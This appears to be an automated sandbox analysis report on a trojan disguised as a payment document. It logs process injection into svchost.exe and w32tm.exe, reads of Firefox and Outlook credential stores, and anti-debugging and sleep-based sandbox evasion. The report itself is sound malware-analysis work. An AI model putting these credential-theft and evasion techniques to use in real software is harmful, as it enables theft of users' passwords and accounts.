                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@17/11
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_009537B5 GetLastError,FormatMessageW,0_2_009537B5
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_009410BF AdjustTokenPrivileges,CloseHandle,0_2_009410BF
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_009416C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_009416C3
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_009551CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_009551CD
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0096A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0096A67C
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0095648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0095648E
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_008E42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_008E42A2
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeFile created: C:\Users\user\AppData\Local\Temp\SheitanJump to behavior
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: w32tm.exe, 00000003.00000003.2134765940.0000000003382000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4152385313.0000000003382000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeReversingLabs: Detection: 76%
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeVirustotal: Detection: 36%
                Source: unknownProcess created: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe"
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe"
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeProcess created: C:\Windows\SysWOW64\w32tm.exe "C:\Windows\SysWOW64\w32tm.exe"
                Source: C:\Windows\SysWOW64\w32tm.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe"Jump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeProcess created: C:\Windows\SysWOW64\w32tm.exe "C:\Windows\SysWOW64\w32tm.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: logoncli.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\w32tm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeStatic file information: File size 1619968 > 1048576
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: w32tm.pdb source: svchost.exe, 00000001.00000003.1850120491.0000000003030000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1849315584.000000000301B000.00000004.00000020.00020000.00000000.sdmp, vtTdsKSTqQr.exe, 00000002.00000002.4152651479.0000000001548000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vtTdsKSTqQr.exe, 00000002.00000002.4152048473.000000000083E000.00000002.00000001.01000000.00000004.sdmp, vtTdsKSTqQr.exe, 00000007.00000000.1963095315.000000000083E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1704571921.0000000004250000.00000004.00001000.00020000.00000000.sdmp, Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1704263244.0000000004580000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1785222613.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1892565492.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1892565492.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1783458890.0000000003200000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000003.1894878199.0000000003737000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000003.1892506517.0000000003586000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153282108.0000000003A7E000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153282108.00000000038E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1704571921.0000000004250000.00000004.00001000.00020000.00000000.sdmp, Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1704263244.0000000004580000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1785222613.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1892565492.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1892565492.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1783458890.0000000003200000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, w32tm.exe, 00000003.00000003.1894878199.0000000003737000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000003.1892506517.0000000003586000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153282108.0000000003A7E000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153282108.00000000038E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: w32tm.exe, 00000003.00000002.4152385313.0000000003304000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153951411.0000000003F0C000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.00000000029AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253315519.000000004025C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: w32tm.exe, 00000003.00000002.4152385313.0000000003304000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153951411.0000000003F0C000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.00000000029AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253315519.000000004025C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: w32tm.pdbGCTL source: svchost.exe, 00000001.00000003.1850120491.0000000003030000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1849315584.000000000301B000.00000004.00000020.00020000.00000000.sdmp, vtTdsKSTqQr.exe, 00000002.00000002.4152651479.0000000001548000.00000004.00000020.00020000.00000000.sdmp
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008E42DE
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00900A76 push ecx; ret 0_2_00900A89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401911 push esp; ret 1_2_0040191D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401922 push esp; ret 1_2_00401927
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403320 push eax; ret 1_2_00403322
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411CCB push es; retf 1_2_00411CD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411E14 push cs; retf 1_2_00411E1C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004176E6 push esp; retf 1_2_004176EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD push ecx; mov dword ptr [esp], ecx1_2_036309B6
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeCode function: 2_2_03E89B30 push esp; retf 2_2_03E89B39
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeCode function: 2_2_03E8425E push cs; retf 2_2_03E84266
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeCode function: 2_2_03E84115 push es; retf 2_2_03E84122
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039109AD push ecx; mov dword ptr [esp], ecx3_2_039109B6
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DE43C3 push esp; retf 3_2_00DE43CC
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DEC858 pushfd ; ret 3_2_00DEC85A
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DDE9A8 push es; retf 3_2_00DDE9B5
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DDEAF1 push cs; retf 3_2_00DDEAF9
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0363D30B push edi; retf 3_2_0363D310
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0363B3E9 push FAEDBBA1h; ret 3_2_0363B3F1
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03645142 push eax; ret 3_2_03645144
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0363C1D1 push ebx; retf 3_2_0363C1D2
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0363D639 push esp; retf 3_2_0363D645
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0363A6DA push eax; iretd 3_2_0363A6DF
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03634B94 push edx; retf 3_2_03634BB5
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_0363A93A push esi; iretd 3_2_0363A93F
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03635E6E push edi; ret 3_2_03635E6F
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeFile created: \payment notification confirmation documents 09_01_2025 paper bill.exe
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeFile created: \payment notification confirmation documents 09_01_2025 paper bill.exeJump to behavior
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_008FF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008FF98E
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00971C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00971C41
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97852
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeAPI/Special instruction interceptor: Address: 41C04A4
                Source: C:\Windows\SysWOW64\w32tm.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\w32tm.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\w32tm.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\w32tm.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\w32tm.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\w32tm.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\w32tm.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\w32tm.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AD1C0 rdtsc 1_2_036AD1C0
                Source: C:\Windows\SysWOW64\w32tm.exeWindow / User API: threadDelayed 9773Jump to behavior
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeAPI coverage: 3.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\w32tm.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\w32tm.exe TID: 7876Thread sleep count: 199 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exe TID: 7876Thread sleep time: -398000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exe TID: 7876Thread sleep count: 9773 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exe TID: 7876Thread sleep time: -19546000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe TID: 7888Thread sleep time: -85000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe TID: 7888Thread sleep time: -42000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe TID: 7888Thread sleep time: -46500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\w32tm.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_009568EE FindFirstFileW,FindClose,0_2_009568EE
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0095698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0095698F
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0094D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0094D076
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0094D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0094D3A9
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00959642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00959642
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0095979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0095979D
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0094DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0094DBBE
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00959B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00959B2B
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00955C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00955C97
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DECAA0 FindFirstFileW,FindNextFileW,FindClose,3_2_00DECAA0
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008E42DE
                Source: w32tm.exe, 00000003.00000002.4152385313.0000000003304000.00000004.00000020.00020000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4152710956.0000000000B09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000008.00000002.2254839179.000002A3402BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AD1C0 rdtsc 1_2_036AD1C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417D03 LdrLoadDll,1_2_00417D03
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0095EAA2 BlockInput,0_2_0095EAA2
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00912622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00912622
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008E42DE
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00904CE8 mov eax, dword ptr fs:[00000030h]0_2_00904CE8
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_041C0710 mov eax, dword ptr fs:[00000030h]0_2_041C0710
